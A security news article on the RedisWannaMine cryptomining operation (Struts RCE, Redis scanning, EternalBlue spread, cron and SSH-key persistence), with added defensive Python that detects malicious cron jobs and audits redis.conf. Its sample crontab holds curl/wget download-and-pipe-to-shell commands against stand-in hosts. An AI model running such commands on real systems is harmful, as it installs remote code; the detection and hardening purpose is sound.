RedisWannaMine Cryptocurrency-Mining Operation Found Targeting Servers with EternalBlue

Security researcher Nadav Avital uncovered a cryptocurrency-mining operation they named RedisWannaMine, which targets database and application servers and, among other techniques, uses the notorious EternalBlue exploit to spread.

RedisWannaMine exploits CVE-2017-9805, a remote code execution (RCE) vulnerability in Apache Struts, an open-source framework for developing Java web applications that is reportedly used by at least 65% of Fortune 100 companies. The operators exploit this flaw to run a shell command that downloads the cryptocurrency-mining malware.

[Security 101: The Impact of Cryptocurrency-Mining Malware]

When the researchers followed the operation's trail, they also found a shell script responsible for:

  • Downloading cryptocurrency-mining malware
  • Gaining persistence through new entries in crontab, the Linux time-based job scheduler
  • Gaining remote access to the affected system through a new Secure Shell (SSH) key entry
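The two persistence mechanisms listed above (a scheduled download-and-execute job and an added SSH key) leave footprints a responder can hunt for. The following is an added example, not code from the original article or from the researchers: it flags crontab entries that pipe a fetched payload into a shell and authorized_keys entries that are not on a known-good list. The crontab, key file and allow-list are constructed sample data; the IP addresses are documentation ranges, not indicators from the operation.

```python
"""Triage helper for the persistence described above: flag crontab entries
that pull a remote payload into a shell, and authorized_keys entries that
are not on an allow-list. Added example; all sample data is constructed."""
import re

# Constructed sample crontab modelled on the download-and-execute pattern
# described above. Not taken from the original page or the real operation.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 3 * * * /usr/local/bin/backup.sh
*/5 * * * * curl -fsSL http://203.0.113.10/x.sh | sh
*/10 * * * * wget -q -O- http://198.51.100.7/mine.sh | bash
"""

# Constructed sample authorized_keys: one known admin key, one unknown key.
SAMPLE_AUTH_KEYS = """\
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIExampleKnownAdminKey000000000000000 admin@corp
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDunknownkey root@kali
"""

# Allow-list of key material the organisation actually issued (constructed).
KNOWN_KEYS = {"AAAAC3NzaC1lZDI1NTE5AAAAIExampleKnownAdminKey000000000000000"}

DOWNLOAD_TOOLS = re.compile(r"\b(curl|wget|fetch)\b")
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|z|da)?sh\b")


def suspicious_cron_entries(crontab_text):
    """Return [(line_number, command)] for jobs that fetch-and-pipe to a shell."""
    hits = []
    for lineno, line in enumerate(crontab_text.splitlines(), 1):
        stripped = line.strip()
        if not stripped or stripped.startswith("#"):
            continue
        fields = stripped.split(None, 5)  # five schedule fields, then command
        if len(fields) < 6:
            continue  # environment assignment or malformed line
        command = fields[5]
        if DOWNLOAD_TOOLS.search(command) and PIPE_TO_SHELL.search(command):
            hits.append((lineno, command))
    return hits


def unknown_ssh_keys(auth_keys_text, known_keys):
    """Return [(key_type, comment)] for keys whose material is not allow-listed."""
    unknown = []
    for line in auth_keys_text.splitlines():
        parts = line.split()
        if len(parts) < 2 or line.lstrip().startswith("#"):
            continue
        # authorized_keys lines may carry options before the key type; the key
        # material is the base64 blob that follows the type token.
        for i, tok in enumerate(parts):
            if tok.startswith(("ssh-", "ecdsa-")) and i + 1 < len(parts):
                if parts[i + 1] not in known_keys:
                    comment = parts[i + 2] if i + 2 < len(parts) else ""
                    unknown.append((tok, comment))
                break
    return unknown


if __name__ == "__main__":
    for lineno, cmd in suspicious_cron_entries(SAMPLE_CRONTAB):
        print(f"crontab line {lineno}: {cmd}")
    for key_type, comment in unknown_ssh_keys(SAMPLE_AUTH_KEYS, KNOWN_KEYS):
        print(f"unknown key: {key_type} {comment}")
```

In practice the crontab check should be run against every user's crontab (the `crontab -l -u` output or /var/spool/cron) and the system cron directories, and the key check against every authorized_keys file on the host, including root's.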

RedisWannaMine's attack chain also involves scanning for vulnerable Redis servers (an open-source in-memory data store commonly used as a database or cache) on port 6379 and infecting them with the cryptocurrency-mining malware. It also uses a transmission control protocol (TCP) scanner to find hosts with port 445 open, the default port of Server Message Block (SMB), and then exploits EternalBlue to drop the miner and spread further.
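A Redis instance only becomes a target for the scanning stage described above if it is reachable from the network and accepts commands without authentication. The following is an added example, not code from the original article: it parses a redis.conf and reports the settings that make an instance exposed, shown against a weak configuration and a hardened one. Both configurations are constructed samples; the password in the hardened one is a placeholder.

```python
"""Audit a redis.conf for the exposure the scanning stage described above
relies on: Redis listening on a routable interface with no authentication.
Added example, not from the page; both sample configurations are constructed."""

# Constructed: a configuration that leaves the instance open to anyone who
# can reach TCP port 6379.
WEAK_CONF = """\
port 6379
bind 0.0.0.0
protected-mode no
# requirepass is commented out
"""

# Constructed: loopback only, protected mode on, password set (placeholder),
# and the administrative commands an intruder needs renamed away.
HARDENED_CONF = """\
port 6379
bind 127.0.0.1
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
rename-command FLUSHALL ""
"""


def parse_redis_conf(text):
    """Return {directive: [values...]}, keeping repeated directives in order."""
    conf = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        name, _, rest = line.partition(" ")
        conf.setdefault(name.lower(), []).append(rest.strip())
    return conf


def audit_redis_conf(text):
    """Return a list of exposure findings; an empty list means none found."""
    conf = parse_redis_conf(text)
    findings = []

    # With no bind directive Redis listens on every interface.
    binds = " ".join(conf.get("bind", [])).split()
    wildcard = any(b in ("0.0.0.0", "*", "::") for b in binds)
    non_loopback = any(not b.startswith(("127.", "::1")) for b in binds)
    if not binds or wildcard or non_loopback:
        findings.append("listens on a non-loopback interface")

    # protected-mode (default yes) refuses remote clients when no password
    # and no explicit bind are configured; turning it off removes that guard.
    if conf.get("protected-mode", ["yes"])[-1].lower() != "yes":
        findings.append("protected-mode disabled")

    if not conf.get("requirepass") or conf["requirepass"][-1].strip('"') == "":
        findings.append("no requirepass set")

    # An unauthenticated client with CONFIG SET dir/dbfilename plus SAVE can
    # write attacker-controlled content to arbitrary paths such as cron or
    # authorized_keys, so CONFIG should be renamed or disabled.
    renamed = {v.split()[0].upper() for v in conf.get("rename-command", []) if v}
    if "CONFIG" not in renamed:
        findings.append("CONFIG command reachable")
    return findings


if __name__ == "__main__":
    print("weak:    ", audit_redis_conf(WEAK_CONF))
    print("hardened:", audit_redis_conf(HARDENED_CONF))
```

Renaming commands is a mitigation of last resort; the primary controls are binding to loopback or a private interface, requiring a password, and keeping port 6379 off the internet-facing perimeter, which is exactly where the operation's scanner looks.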

[From TrendLabs Security Intelligence: Will Cryptocurrency-Mining Malware Be the Next Ransomware?]

RedisWannaMine isn't the first to employ these techniques or to target Apache software. Last February, Trend Micro uncovered malicious Monero miners exploiting two vulnerabilities in Apache CouchDB. There was also a fileless cryptocurrency-mining malware last year that used EternalBlue for propagation and abused the Windows Management Instrumentation (WMI) command-line tool for persistence. Nearly four months before that, the Monero-mining Adylkuzz emerged to cash in on the WannaCry outbreak.

Indeed, these types of malware are becoming as widespread as the cryptocurrencies themselves. In fact, cryptocurrency mining was the most detected network event on devices connected to home routers, peaking at over 23 million detections in the third quarter of 2017.

[Figure: Trend Micro's proactive solutions against fileless cryptocurrency-mining malware]

Given that RedisWannaMine targets servers, it could significantly affect the organizations that run them. Apart from increased power consumption, it also risks disrupting operations, since the malware hijacks the processing resources it needs to mine cryptocurrency.

More importantly, RedisWannaMine also highlights the real-world importance of patching and of adopting best practices for the system administrators responsible for their company's online perimeter. This is particularly true for organizations that build, use, and deploy their own web applications, as they need to integrate security at each stage of the application's lifecycle. As with other threats that weaponized potent exploits, one vulnerable device is all it takes to put every system connected to it at risk.

Trend Micro™ Deep Security™, Vulnerability Protection, and TippingPoint provide virtual patching that protects endpoints from threats that abuse unpatched vulnerabilities. Trend Micro's solutions for CVE-2017-9805 are described in this article. Trend Micro's detections for the malicious miners are Coinminer_MALXMR.AB-WIN32, ELF_SETAG.TNX, and Suspicious_GEN.F47V0305.
